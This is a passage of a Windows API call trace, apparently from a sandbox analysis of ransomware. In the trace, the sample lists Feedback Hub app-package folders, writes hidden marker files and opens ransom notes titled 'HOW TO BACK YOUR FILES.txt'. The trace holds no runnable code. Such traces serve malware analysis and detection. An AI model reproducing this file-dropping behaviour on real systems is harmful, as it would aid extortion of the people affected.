lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.568] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.568] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3589ae, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3589ae, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3589ae, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.568] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.568] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.568] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3589ae, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3589ae, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3589ae, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.569] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.569] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.569] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.569] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.569] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.569] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.570] CloseHandle (hObject=0x278) returned 1 [0063.571] CloseHandle (hObject=0x298) returned 1 [0063.571] GetCurrentThreadId () returned 0xd98 [0063.571] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0063.571] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState" [0063.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e388 | out: hHeap=0xe0000) returned 1 [0063.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0063.571] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState" [0063.571] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState\\" [0063.571] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0063.571] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.572] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.575] FlushFileBuffers (hFile=0x298) returned 1 [0063.576] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.576] CloseHandle (hObject=0x298) returned 1 [0063.576] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState") returned 92 [0063.576] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.576] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed55c81, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a52772, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef37ebe3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0063.577] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.577] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.577] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.577] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.577] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed55c81, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a52772, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef37ebe3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.577] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.577] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.577] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.577] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.577] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.577] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef37ebe3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef37ebe3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef37ebe3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.577] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.577] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.577] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef37ebe3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef37ebe3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef37ebe3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.577] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0063.581] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.582] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.582] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.582] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.582] CloseHandle (hObject=0x278) returned 1 [0063.582] CloseHandle (hObject=0x298) returned 1 [0063.582] GetCurrentThreadId () returned 0xd98 [0063.582] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0063.582] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache" [0063.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0063.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0063.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache" [0063.582] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache\\" [0063.582] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0063.583] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.586] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.588] FlushFileBuffers (hFile=0x298) returned 1 [0063.589] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.589] CloseHandle (hObject=0x298) returned 1 [0063.590] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache") returned 92 [0063.590] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.590] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5d1c9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a51d81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef37ebe3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0063.590] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.590] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.590] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.590] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.590] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed5d1c9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a51d81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef37ebe3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.590] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.590] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.590] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.590] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.590] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.590] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef37ebe3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef37ebe3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3a4df4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.590] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.590] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.590] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef37ebe3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef37ebe3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3a4df4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.590] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0063.590] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.591] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.591] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.591] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.591] CloseHandle (hObject=0x278) returned 1 [0063.591] CloseHandle (hObject=0x298) returned 1 [0063.591] GetCurrentThreadId () returned 0xd98 [0063.592] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0063.592] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData" [0063.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122fc0 | out: hHeap=0xe0000) returned 1 [0063.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0063.592] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData" [0063.592] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData\\" [0063.592] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0063.592] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.593] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.596] FlushFileBuffers (hFile=0x298) returned 1 [0063.597] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.597] CloseHandle (hObject=0x298) returned 1 [0063.597] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData") returned 89 [0063.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.597] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed66dee, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed66dee, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef3a4df4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.598] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.598] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.598] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.598] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.598] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed66dee, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbed66dee, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef3a4df4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.598] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.598] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.598] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.598] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.598] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.598] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3a4df4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3a4df4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3a4df4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.598] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.598] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.598] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3a4df4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3a4df4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3a4df4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.598] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.598] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), 